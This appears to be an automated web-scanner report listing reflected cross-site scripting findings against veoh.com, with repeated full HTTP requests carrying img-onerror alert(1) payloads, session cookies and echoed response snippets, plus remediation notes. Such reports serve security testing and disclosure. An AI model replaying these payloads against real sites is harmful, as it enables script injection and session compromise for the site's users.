The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8887d"><img%20src%3da%20onerror%3dalert(1)>d7d3c7b55c9 was submitted in the REST URL parameter 4. This input was echoed as 8887d"><img src=a onerror=alert(1)>d7d3c7b55c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure8887d"><img%20src%3da%20onerror%3dalert(1)>d7d3c7b55c9/watch/v20753891TQ237Z7N HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:26 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=4
Content-Length: 76350
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure8887d"><img src=a onerror=alert(1)>d7d3c7b55c9/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 217c0'%3b0ff76e45310 was submitted in the REST URL parameter 6. This input was echoed as 217c0';0ff76e45310 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N217c0'%3b0ff76e45310 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:46 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90
Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d72a7"><img%20src%3da%20onerror%3dalert(1)>bce4688ba7f was submitted in the REST URL parameter 4. This input was echoed as d72a7"><img src=a onerror=alert(1)>bce4688ba7f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventured72a7"><img%20src%3da%20onerror%3dalert(1)>bce4688ba7f/watch/v2075425966g5b8E8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:36:42 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=78 Content-Length: 76749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventured72a7"><img src=a onerror=alert(1)>bce4688ba7f/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e341d<img%20src%3da%20onerror%3dalert(1)>553e22281c1 was submitted in the REST URL parameter 4. This input was echoed as e341d<img src=a onerror=alert(1)>553e22281c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventuree341d<img%20src%3da%20onerror%3dalert(1)>553e22281c1/watch/v2075425966g5b8E8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:36 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=93
Content-Length: 76705
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuree341d<img src=a onerror=alert(1)>553e22281c1"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 134b4'%3b0705df69313 was submitted in the REST URL parameter 6. This input was echoed as 134b4';0705df69313 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v2075425966g5b8E8134b4'%3b0705df69313 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:14 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=51
Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cf07"><img%20src%3da%20onerror%3dalert(1)>5bb73bd76de was submitted in the REST URL parameter 4. This input was echoed as 6cf07"><img src=a onerror=alert(1)>5bb73bd76de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure6cf07"><img%20src%3da%20onerror%3dalert(1)>5bb73bd76de/watch/v20754927ZpAfSEzt HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:12 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=62
Content-Length: 76243
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure6cf07"><img src=a onerror=alert(1)>5bb73bd76de/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9241d<img%20src%3da%20onerror%3dalert(1)>74c4f0281bf was submitted in the REST URL parameter 4. This input was echoed as 9241d<img src=a onerror=alert(1)>74c4f0281bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure9241d<img%20src%3da%20onerror%3dalert(1)>74c4f0281bf/watch/v20754927ZpAfSEzt HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:48 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=63
Content-Length: 76199
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure9241d<img src=a onerror=alert(1)>74c4f0281bf"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f615e'%3b41e7360e1ba was submitted in the REST URL parameter 6. This input was echoed as f615e';41e7360e1ba in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20754927ZpAfSEztf615e'%3b41e7360e1ba HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=64
Content-Length: 94049
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c9a6b<img%20src%3da%20onerror%3dalert(1)>0a8a5dfab55 was submitted in the REST URL parameter 4. This input was echoed as c9a6b<img src=a onerror=alert(1)>0a8a5dfab55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventurec9a6b<img%20src%3da%20onerror%3dalert(1)>0a8a5dfab55/watch/v20756872Ta2Y7sDB HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=19
Content-Length: 76652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventurec9a6b<img src=a onerror=alert(1)>0a8a5dfab55"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29b15"><img%20src%3da%20onerror%3dalert(1)>23623364388 was submitted in the REST URL parameter 4. This input was echoed as 29b15"><img src=a onerror=alert(1)>23623364388 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure29b15"><img%20src%3da%20onerror%3dalert(1)>23623364388/watch/v20756872Ta2Y7sDB HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:30 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=73
Content-Length: 76696
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure29b15"><img src=a onerror=alert(1)>23623364388/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80777'%3b1ead9050767 was submitted in the REST URL parameter 6. This input was echoed as 80777';1ead9050767 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB80777'%3b1ead9050767 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:48 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90
Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55707"><img%20src%3da%20onerror%3dalert(1)>2b623c86a4a was submitted in the REST URL parameter 4. This input was echoed as 55707"><img src=a onerror=alert(1)>2b623c86a4a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure55707"><img%20src%3da%20onerror%3dalert(1)>2b623c86a4a/watch/v20757961gnh48zmS HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:23 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=100
Content-Length: 76349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure55707"><img src=a onerror=alert(1)>2b623c86a4a/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a9c05<img%20src%3da%20onerror%3dalert(1)>ebb993b4b67 was submitted in the REST URL parameter 4. This input was echoed as a9c05<img src=a onerror=alert(1)>ebb993b4b67 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventurea9c05<img%20src%3da%20onerror%3dalert(1)>ebb993b4b67/watch/v20757961gnh48zmS HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=78
Content-Length: 76305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventurea9c05<img src=a onerror=alert(1)>ebb993b4b67"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1adb'%3b90455422d30 was submitted in the REST URL parameter 6. This input was echoed as a1adb';90455422d30 in the application's response.
